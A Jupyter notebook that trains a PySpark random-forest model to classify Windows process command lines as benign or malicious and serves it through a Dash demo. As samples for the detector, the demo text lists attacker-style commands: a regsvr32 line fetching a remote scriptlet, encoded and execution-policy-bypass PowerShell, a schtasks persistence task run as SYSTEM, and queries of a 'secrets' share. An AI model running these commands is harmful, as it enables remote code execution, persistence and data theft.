In [2]:
from pyspark.conf import SparkConf
from pyspark.sql import SparkSession
import pyspark.sql.functions as F
import pyspark.sql.types as T
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from pyspark.ml import feature, evaluation, Pipeline
from pyspark.ml.classification import RandomForestClassifier
from pyspark.ml.evaluation import BinaryClassificationEvaluator
from pyspark.ml.tuning import CrossValidator, ParamGridBuilder
from functools import reduce
from pyspark.sql import DataFrame
from pyspark.sql import Row

In [3]:
# Spark configuration: application name, master URL and resource settings,
# assembled in one chained builder expression.
conf = (
    SparkConf()
    .setAppName('random_forest')
    .setMaster('spark://spark-master:7077')
    .set("spark.executor.memory", "6g")
    .set("spark.driver.maxResultSize", "0")
    .set("spark.sql.shuffle.partitions", "6")
    .set("spark.default.parallelism", "6")
    .set("spark.driver.memory", "3g")
)
conf

<pyspark.conf.SparkConf at 0x7f45b71bf5c0>

In [4]:
# Start a SparkSession with the settings in `conf`, or reuse one that already exists.
spark = SparkSession.builder.config(conf=conf).getOrCreate()

In [5]:
# Read the original (non-bootstrapped) dataset from HDFS as CSV.
# The first line is a header, column types are inferred, and a double quote
# is used as the escape character inside quoted fields.
no_bootstrap_reader = spark.read.format('csv')
no_bootstrap_reader = no_bootstrap_reader.option('inferSchema', 'true')
no_bootstrap_reader = no_bootstrap_reader.option('header', 'true')
no_bootstrap_reader = no_bootstrap_reader.option('escape', '"')
df = no_bootstrap_reader.load('hdfs://namenode:9000/data/no_bootstrap.csv')

In [6]:
# Number of rows in the loaded dataset.
df.count()

52395

### Create command line tokens

In [7]:
import re
# Lower-cased tokens that are dropped from every command line.
_CLEAN_INPUT2_IGNORED = frozenset(
    ['windows', 'system32', 'cmd.exe', 'sandcat.exe', 'c', 'windowspowershell', 'v1.0', 'powershell.exe', '']
)

# Separators / noise that are replaced by a single space before splitting.
# Compiled once here instead of on every row.
# NOTE(review): the `$.` and `$_.` alternatives start with an unescaped end-of-string
# anchor and therefore can never match; they were probably meant to be `\$.` / `\$_.`.
# The pattern is left untouched so that tokens stay identical to the ones the model
# (and demo_clean_input) were built with -- change both together if this is fixed.
_CLEAN_INPUT2_PATTERN = re.compile(r"""
        [:|"?']
        | --field-trial-handle=.*\d+
        | //.*com(/.*)/
        | \s*"\s*
        | \{.*\}
        | [=;(),]
        | \\
        | //
        | \s+\.\s+ 
        | $.
        | $_.
        | (>>)
    """, re.VERBOSE)


@F.udf(returnType=T.StringType())
def clean_input2(s):
    """Turn a raw command line into a comma-joined string of lower-cased tokens.

    Every match of the separator pattern is replaced by a space, the result is split
    on whitespace, and tokens are kept only if they have at least two characters and
    are not in the ignored-token list.

    Args:
        s: raw command-line string; may be None when the source column is null.

    Returns:
        The surviving tokens joined with ','. A None input yields '' instead of
        raising inside the UDF.
    """
    if s is None:
        return ''

    tokens = []
    for raw_token in _CLEAN_INPUT2_PATTERN.sub(' ', s).split():
        token = raw_token.lower()
        # Length is checked on the original token, exactly as before.
        if token not in _CLEAN_INPUT2_IGNORED and len(raw_token) >= 2:
            tokens.append(token)
    return ','.join(tokens)

In [8]:
from pyspark.sql.functions import regexp_extract, regexp_replace, col, count, split, size, to_date

def clean_input1(df):
    """Return `df` with an integer `class_label` and a `cmd_line_tokens` array column.

    `cmd_line_tokens` is produced by running `clean_input2` on `command_line` and
    splitting its comma-joined result back into an array.
    """
    label_as_int = col('class_label').cast('int')
    token_array = split(clean_input2(col('command_line')), ',')

    return (
        df.select('*')
        .withColumn('class_label', label_as_int)
        .withColumn('cmd_line_tokens', token_array)
    )

In [9]:
# Cast class_label to int and add the cmd_line_tokens column (see clean_input1).
df = clean_input1(df)

In [10]:
# Keep only rows whose command line produced more than two tokens.
df = df.filter(F.size('cmd_line_tokens') > 2)

# Data engineering pipelines 
+ Term Frequency (one-hot): value indicates if feature is present in observation
+ A token must appear at least once in a command line (`minTF=1`) and in at least 5 command lines (`minDF=5`) to be included in the vocabulary

In [11]:
# Binary bag-of-words over cmd_line_tokens: binary=True emits 1.0 for every token that is
# present, and minDF=5 requires a token to occur in at least 5 rows to enter the vocabulary.
cv_transformer = feature.CountVectorizer(minTF=1, minDF=5, binary=True, inputCol='cmd_line_tokens', outputCol='tf')

In [12]:
# Fit the vectorizer alone on the full (pre-split) dataset; the cells below use it
# only to inspect the features and the vocabulary size.
estimator = Pipeline(stages=[cv_transformer]).fit(df)

In [13]:
# Show up to 20 untruncated rows from a 20% sample: tokens next to their sparse 'tf' vector.
estimator.transform(df).select('cmd_line_tokens','tf').sample(.2).show(20, False)

+-----------------------------------------------------------------------------+------------------------------------------------------+
|cmd_line_tokens                                                              |tf                                                    |
+-----------------------------------------------------------------------------+------------------------------------------------------+
|[svchost.exe, -k, localservicenetworkrestricted, -p, -s, lmhosts]            |(1519,[25,26,57,60,103,459],[1.0,1.0,1.0,1.0,1.0,1.0])|
|[svchost.exe, -k, localservicenetworkrestricted, -p, -s, dhcp]               |(1519,[25,26,57,60,103,567],[1.0,1.0,1.0,1.0,1.0,1.0])|
|[svchost.exe, -k, localservicenetworkrestricted, -p]                         |(1519,[25,26,57,103],[1.0,1.0,1.0,1.0])               |
|[svchost.exe, -k, networkservice, -p, -s, dnscache]                          |(1519,[25,26,57,60,151,596],[1.0,1.0,1.0,1.0,1.0,1.0])|
|[svchost.exe, -k, netsvcs, -p, -s, usermanager]       

In [14]:
# Size of the vocabulary learned by the fitted CountVectorizer stage.
len(estimator.stages[0].vocabulary)

1519

In [15]:
# Random 60% / 30% / 10% split into training, validation and testing sets (fixed seed).
training_df, validation_df, testing_df = df.randomSplit([0.6, 0.3, 0.1], seed=0)

In [16]:
# Baseline random forest on the binary token features, trained on the training split.
rf = RandomForestClassifier(
    featuresCol='tf',
    labelCol='class_label',
    numTrees=100,
    maxDepth=6,
    impurity='gini',
    featureSubsetStrategy='sqrt',
    seed=0,
)

# Vectorizer and classifier are chained so the vocabulary is learned from the
# same data the forest is fitted on.
rf_estimator = Pipeline(stages=[cv_transformer, rf])
rf_model = rf_estimator.fit(training_df)

In [17]:
# Accuracy of the baseline model on the testing split: the mean of a 1.0/0.0
# "prediction equals label" indicator.
is_correct = F.expr('float(class_label = prediction)')
rf_model.transform(testing_df).select(F.avg(is_correct).alias('accuracy')).first()

Row(accuracy=0.9789359391965256)

In [18]:
# Print the decision rules of one tree (index 3) of the baseline forest.
print(rf_model.stages[-1].trees[3].toDebugString)

DecisionTreeClassificationModel (uid=dtc_44a9b1babff9) of depth 6 with 13 nodes
  If (feature 198 <= 0.5)
   If (feature 332 <= 0.5)
    If (feature 192 <= 0.5)
     If (feature 334 <= 0.5)
      If (feature 3 <= 0.5)
       If (feature 884 <= 0.5)
        Predict: 0.0
       Else (feature 884 > 0.5)
        Predict: 1.0
      Else (feature 3 > 0.5)
       Predict: 0.0
     Else (feature 334 > 0.5)
      Predict: 1.0
    Else (feature 192 > 0.5)
     Predict: 1.0
   Else (feature 332 > 0.5)
    Predict: 1.0
  Else (feature 198 > 0.5)
   Predict: 1.0



# Inference

+ The tokens with the most importance all indicate a malicious log and are very similar to the tokens identified in the LR model

In [19]:
# Pair every vocabulary token with the forest's importance for that feature
# and list the 20 most important tokens.
vocab = rf_model.stages[0].vocabulary
feature_importance = rf_model.stages[-1].featureImportances.toArray()
vocab_importance_df = pd.DataFrame(
    {
        'vocab': vocab,
        'weight': feature_importance,
    }
)
top_baseline_tokens = vocab_importance_df.sort_values('weight', ascending=False)
top_baseline_tokens.head(20)

Unnamed: 0,vocab,weight
102,-executionpolicy,0.107252
100,bypass,0.085936
97,-c,0.057613
158,/c,0.050603
171,select-object,0.039596
193,reg,0.036716
198,hklm,0.026495
206,-first,0.022687
192,select,0.021821
227,currentversion,0.021065


# Model Tuning

In [20]:
# Hyper-parameter grid: 3 minDF values x 5 numTrees values x 3 maxDepth values = 45 combinations.
# The Param objects are taken from the stages of the already fitted baseline pipeline.
vectorizer_stage = rf_model.stages[0]
forest_stage = rf_model.stages[1]

paramGrid = (
    ParamGridBuilder()
    .addGrid(vectorizer_stage.minDF, [3, 5, 10])
    .addGrid(forest_stage.numTrees, [300, 400, 500, 600, 700])
    .addGrid(forest_stage.maxDepth, [10, 15, 20])
    .build()
)

In [21]:
models = []
for grid in range(len(paramGrid)):
    print("Fitting model {}".format(grid))
    _model = rf_estimator.fit(validation_df, paramGrid[grid])
    models.append(_model)

Fitting model 0
Fitting model 1
Fitting model 2
Fitting model 3
Fitting model 4
Fitting model 5
Fitting model 6
Fitting model 7
Fitting model 8
Fitting model 9
Fitting model 10
Fitting model 11
Fitting model 12
Fitting model 13
Fitting model 14
Fitting model 15
Fitting model 16
Fitting model 17
Fitting model 18
Fitting model 19
Fitting model 20
Fitting model 21
Fitting model 22
Fitting model 23
Fitting model 24
Fitting model 25
Fitting model 26
Fitting model 27
Fitting model 28
Fitting model 29
Fitting model 30
Fitting model 31
Fitting model 32
Fitting model 33
Fitting model 34
Fitting model 35
Fitting model 36
Fitting model 37
Fitting model 38
Fitting model 39
Fitting model 40
Fitting model 41
Fitting model 42
Fitting model 43
Fitting model 44


In [22]:
# Area under the ROC curve, with class_label as the ground truth.
evaluator = BinaryClassificationEvaluator(metricName='areaUnderROC', labelCol='class_label')


def _validation_auc(fitted_pipeline):
    """Score one fitted pipeline on validation_df with `evaluator`."""
    return evaluator.evaluate(fitted_pipeline.transform(validation_df))


# One score per grid entry, in the same order as `models`.
auc_scores = [_validation_auc(fitted_pipeline) for fitted_pipeline in models]

In [23]:
# AUC on validation_df for every fitted model, in the same order as paramGrid.
auc_scores

[0.9972198490538934,
 0.9981039592638306,
 0.9986022458572986,
 0.9974207939319136,
 0.9982271723783368,
 0.998342116156299,
 0.9976248102777932,
 0.9984694639390772,
 0.9985953941213049,
 0.998326758817003,
 0.9983564102951823,
 0.9984852938118901,
 0.997834497025874,
 0.9981360915429731,
 0.9986068530590875,
 0.996158302508397,
 0.9962404052069413,
 0.9969754310923273,
 0.9950993548972428,
 0.9967163645917404,
 0.9966433581633946,
 0.996238987606391,
 0.9966192589540376,
 0.9968280006350849,
 0.9962028387923556,
 0.9970952183388367,
 0.9972857674794873,
 0.9957744871593741,
 0.9968062640933122,
 0.9971153010133008,
 0.9911085730810886,
 0.9947788590394716,
 0.9959910256434489,
 0.9923972901147878,
 0.9958011853030735,
 0.9956287105694408,
 0.9927487369179097,
 0.9945755514938674,
 0.9957939791669423,
 0.9925721275160047,
 0.9948263486579103,
 0.9953731880702298,
 0.9923717733048805,
 0.9956113449626982,
 0.9956451311091497]

In [24]:
# Select the grid entry with the highest validation AUC (first one on ties)
# and report its parameters and score.
best_model_idx = np.argmax(auc_scores)
best_model = models[best_model_idx]

best_param_map = paramGrid[best_model_idx]
best_validation_auc = auc_scores[best_model_idx]
print("Best params: \n\n{}\n".format(best_param_map))
print("Best Validation AUC: \n\n{}".format(best_validation_auc))

Best params: 

{Param(parent='CountVectorizer_a19d2d2525be', name='minDF', doc='Specifies the minimum number of different documents a term must appear in to be included in the vocabulary. If this is an integer >= 1, this specifies the number of documents the term must appear in; if this is a double in [0,1), then this specifies the fraction of documents. Default 1.0'): 3.0, Param(parent='RandomForestClassifier_40d9ba405786', name='numTrees', doc='Number of trees to train (>= 1)'): 700, Param(parent='RandomForestClassifier_40d9ba405786', name='maxDepth', doc='Maximum depth of the tree. (>= 0) E.g., depth 0 means 1 leaf node; depth 1 means 1 internal node + 2 leaf nodes.'): 20}

Best Validation AUC: 

0.9986068530590875


## Best model
+ minDF: 3
+ numTrees: 700
+ maxDepth: 20

In [25]:
# Token importances of the selected model; `best_vocab_importance_df` is also the
# lookup table used by get_coefs() in the Dash section.
vocab = best_model.stages[0].vocabulary
feature_importance = best_model.stages[-1].featureImportances.toArray()
best_vocab_importance_df = pd.DataFrame(
    {
        'token': vocab,
        'importance': feature_importance,
    }
)
top_best_tokens = best_vocab_importance_df.sort_values('importance', ascending=False)
top_best_tokens.head(20)

Unnamed: 0,token,importance
107,bypass,0.079016
108,-executionpolicy,0.074952
103,-c,0.060897
192,reg,0.034378
238,net,0.033503
198,hklm,0.028682
195,foreach,0.022863
224,currentversion,0.019843
185,-path,0.017188
344,delete,0.016475


In [39]:
# Print the decision rules of one tree (index 2) of the selected forest.
print(best_model.stages[-1].trees[2].toDebugString)

DecisionTreeClassificationModel (uid=dtc_5d6fc8fe6361) of depth 20 with 49 nodes
  If (feature 1 <= 0.5)
   If (feature 265 <= 0.5)
    If (feature 103 <= 0.5)
     If (feature 677 <= 0.5)
      If (feature 238 <= 0.5)
       If (feature 336 <= 0.5)
        If (feature 783 <= 0.5)
         If (feature 251 <= 0.5)
          If (feature 733 <= 0.5)
           If (feature 531 <= 0.5)
            If (feature 350 <= 0.5)
             If (feature 535 <= 0.5)
              If (feature 720 <= 0.5)
               If (feature 996 <= 0.5)
                If (feature 9 <= 0.5)
                 If (feature 222 <= 0.5)
                  If (feature 1070 <= 0.5)
                   If (feature 705 <= 0.5)
                    If (feature 343 <= 0.5)
                     If (feature 788 <= 0.5)
                      Predict: 0.0
                     Else (feature 788 > 0.5)
                      Predict: 1.0
                    Else (feature 343 > 0.5)
                     Predict: 1.0
                 

# Cross Validation
+ test best_model performance on the held-out testing dataset

In [27]:
# Area under ROC of the selected model on the testing split.
evaluator.evaluate(best_model.transform(testing_df))

0.9985629287817379

In [37]:
# Score the testing split and tally (label, prediction) pairs in ONE aggregation
# instead of four separate filter+count jobs that each re-run the forest.
best_model_df = best_model.transform(testing_df)
confusion_counts = {
    (row['class_label'], row['prediction']): row['count']
    for row in best_model_df.groupBy('class_label', 'prediction').count().collect()
}

# Combinations that never occur are absent from the aggregation, hence the 0 default.
tp = confusion_counts.get((1, 1.0), 0)
tn = confusion_counts.get((0, 0.0), 0)
fp = confusion_counts.get((0, 1.0), 0)
fn = confusion_counts.get((1, 0.0), 0)

# Recall = share of malicious rows that were caught; undefined (NaN) when the
# split contains no positive rows, instead of raising ZeroDivisionError.
recall = tp / (tp + fn) if (tp + fn) else float('nan')

In [38]:
# Recall on the testing split: tp / (tp + fn).
recall

0.6612903225806451

In [36]:
# Confusion matrix on the testing split: rows are actual labels, columns are predictions.
pd.DataFrame(data=[[tn,fp],[fn,tp]], index=['actual_0', 'actual_1'], columns=['predicted_0', 'predicted_1'])

Unnamed: 0,predicted_0,predicted_1
actual_0,4481,0
actual_1,42,82


In [31]:
# Persist the selected pipeline. overwrite() makes the cell re-runnable: a plain
# save() raises once 'rf_model' already exists from a previous run.
best_model.write().overwrite().save('rf_model')

# Plotly Dash Code

In [32]:
# Lower-cased tokens that are dropped from every command line.
common_strings = ['windows', 'system32', 'cmd.exe', 'sandcat.exe', 'c', 'windowspowershell', 'v1.0', 'powershell.exe', '']

import re

# Separators / noise that are replaced by a single space before splitting.
# Compiled once here instead of on every call.
# NOTE(review): the `$.` and `$_.` alternatives start with an unescaped end-of-string
# anchor and therefore can never match; they were probably meant to be `\$.` / `\$_.`.
# The pattern is left untouched so the demo tokenizes exactly like the UDF used for
# training (clean_input2) -- change both together if this is fixed.
_DEMO_CLEAN_PATTERN = re.compile(r"""
        [:|"?']
        | --field-trial-handle=.*\d+
        | //.*com(/.*)/
        | \s*"\s*
        | \{.*\}
        | [=;(),]
        | \\
        | //
        | \s+\.\s+ 
        | $.
        | $_.
        | (>>)
    """, re.VERBOSE)


def demo_clean_input(s):
    """Plain-Python tokenizer for the Dash demo.

    Every match of the separator pattern is replaced by a space, the result is split
    on whitespace, and tokens are kept only if they have at least two characters and
    are not listed in `common_strings`.

    Args:
        s: raw command-line text from the GUI; None or '' is accepted.

    Returns:
        The surviving lower-cased tokens joined with ','. None/'' yields ''.
    """
    if not s:
        return ''

    tokens = []
    for raw_token in _DEMO_CLEAN_PATTERN.sub(' ', s).split():
        token = raw_token.lower()
        # Length is checked on the original token, exactly as before.
        if token not in common_strings and len(raw_token) >= 2:
            tokens.append(token)
    return ','.join(tokens)

In [33]:
def get_coefs(tokens):
    """Format the feature importance of each token passed from the GUI.

    Args:
        tokens: comma-separated token string (as produced by demo_clean_input).

    Returns:
        One "<token>: *<importance>*" line per token, in input order, as a single
        string. Tokens that are not in the model vocabulary get 0.0.

    Importances are read from the module-level `best_vocab_importance_df`
    ('token' / 'importance' columns). Only the "token not in vocabulary" case is
    mapped to 0.0; any other problem (e.g. the table not being defined) now
    propagates instead of being silently reported as zero weights.
    """
    # Build the lookup once per call rather than scanning the frame for every token.
    # setdefault keeps the first row for a token, matching the previous `.values[0]`.
    importance_by_token = {}
    for vocab_token, importance in zip(best_vocab_importance_df['token'],
                                       best_vocab_importance_df['importance']):
        importance_by_token.setdefault(vocab_token, importance)

    _format = "{}: *{:.5f}*\n"
    return "".join(
        _format.format(token, importance_by_token.get(token, 0.0))
        for token in tokens.split(',')
    )

# get_coefs('cmd.exe,/c,/t')

In [34]:
def spark_code(s):
    """Tokenize one command line and classify it with `best_model`.

    Args:
        s: raw command-line text from the GUI.

    Returns:
        A tuple (report, coefs): `report` is a text block with the tokens, the class
        probabilities, the predicted label and a Benign/Malicious verdict; `coefs` is
        the per-token importance listing from get_coefs().
    """
    # create tokens
    tokens = demo_clean_input(s)

    # create a one-row dataframe holding the comma-joined tokens, then split it
    # into the array column the pipeline expects
    _schema = T.StructType([
        T.StructField('cmd_line_tokens', T.StringType(), True),
    ])
    myrow = Row(cmd_line_tokens=tokens)
    text_df = spark.createDataFrame([myrow], schema=_schema).withColumn('cmd_line_tokens', F.split(F.col('cmd_line_tokens'), r','))

    # transform features using existing pipelines
    features = best_model.transform(text_df)

    # Fetch all three columns of the single row in one job instead of three.
    scored_row = features.select('cmd_line_tokens', 'prediction', 'probability').rdd.take(1)[0]
    _features = scored_row['cmd_line_tokens']
    prediction = scored_row['prediction']
    probability = scored_row['probability']

    coefs = get_coefs(tokens)

    result = """
    Tokens: {} \n 
    Probability: {} \n 
    Prediction: {} \n 
    {}
    """

    verdict = "*** Benign ***" if prediction == 0 else "*** Malicious ***"
    return result.format(_features, probability, prediction, verdict), coefs
                         
# spark_code(r'C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS')
# spark_code(r'"powershell.exe -ExecutionPolicy Bypass -C ""Compress-Archive -Path C:\Users\win10-user3\staged-DestinationPath C:\Users\win10-user3\staged.zip -Force;ls C:\Users\win10-user3\staged.zip | foreach {$_.FullName} | select')

In [35]:
import dash
import dash_table
import dash_core_components as dcc
import dash_html_components as html
from jupyterlab_dash import AppViewer
from dash.dependencies import Input, Output

# Stylesheet loaded by the Dash app.
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']

# JupyterLab viewer used at the end of the cell to display the app.
viewer = AppViewer()

# The Dash application; layout and callback are attached below.
app = dash.Dash(name=__name__, external_stylesheets=external_stylesheets)

# Heading and instructions rendered above the input box.
markdown_text = '''
### Windows process command-line classifier (Random Forest)
Please copy and paste your log in the box below
'''

# Example command lines rendered below the output boxes (raw string: backslashes are literal).
# Every example is its own '+ ' list item; the fourth malicious example was missing
# its marker and rendered as part of the previous item.
sample_input_data = r'''
### Example malicious logs 
+ C:\Windows\system32\regsvr32.exe" /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll
+ powershell.exe -ExecutionPolicy Bypass -C "New-Item -Path \".\" -Name \"staged\" -ItemType \"directory\" -Force | foreach {$_.FullName} | Select-Object"
+ cmd.exe /C "net share"
+ powershell.exe -ExecutionPolicy Bypass -C "start powershell.exe -ArgumentList \"-NoP\",\"-StA\",\"-ExecutionPolicy\",\"bypass\",\".\Emulate-Administrator-Tasks.ps1\""
### Example benign logs 
+ C:\Windows\system32\dllhost.exe /Processid:{B2FEB3AD-8AE6-42E7-B2E4-60609573B404}
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS 
+ C:\Windows\System32\Upfc.exe /launchtype boot /cv 09o3CnnAskG8AMTNUwkQhQ.0
### Example logs not in dataset
+ cmd.exe /c schtasks /create /tn "Resume Viewer Update Checker" /tr "powershell.exe -nop -exec bypass -EncodedCommand $pcode" /sc ONLOGON /RU SYSTEM'
+ cmd.exe /c dir /s /b \\\\FILE001\\secrets
+ C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -nop -exec bypass -EncodedCommand SQBtAHAAbwByAHQALQBNAG8AZAB1AGwAZQA
+ cmd.exe /c reg query "\\\\\\\\FILE001\\secrets\\hklm\\system\\currentcontrolset\\control\\terminal server
'''

# Page layout: instructions, input box, submit button, two output boxes
# (classification report and per-token importances), then the example logs.
app.layout = html.Div([
    html.Div([
        html.Div([
            dcc.Markdown(children=markdown_text),
            # Raw string: the Windows path contains '\W', '\S' and '\s', which are invalid
            # escape sequences in a normal string literal (deprecated, warns on newer Pythons).
            # The resulting value is unchanged.
            dcc.Textarea(id='input', value=r'C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc', style={'height': '50px', 'width': '50%'}),

            html.Div([html.Button(children='Submit', id='button', n_clicks=0)], style={'margin': '2px'}),

            html.Div([
                dcc.Textarea(id='output', value='', style={'height': '175px', 'width': '50%'}),
                dcc.Textarea(id='coefs', value='', style={'height': '175px', 'width': '25%'})
            ]),
            dcc.Markdown(children=sample_input_data)
        ])
    ])
])
    
@app.callback(
    [
        # both text areas are filled from the tuple returned below
        Output(component_id='output', component_property='value'),
        Output(component_id='coefs', component_property='value'),
    ],
    # the button's click counter is the reactive trigger
    [Input(component_id='button', component_property='n_clicks')],
    # the input box content is passed along as state
    [dash.dependencies.State('input', 'value')],
)
def on_click(n_clicks, value):
    """Classify the text in the input box and return (report, coefs) for the two outputs."""
    report_and_coefs = spark_code(value)
    return report_and_coefs
    

# Display the Dash app through the JupyterLab AppViewer created above.
viewer.show(app)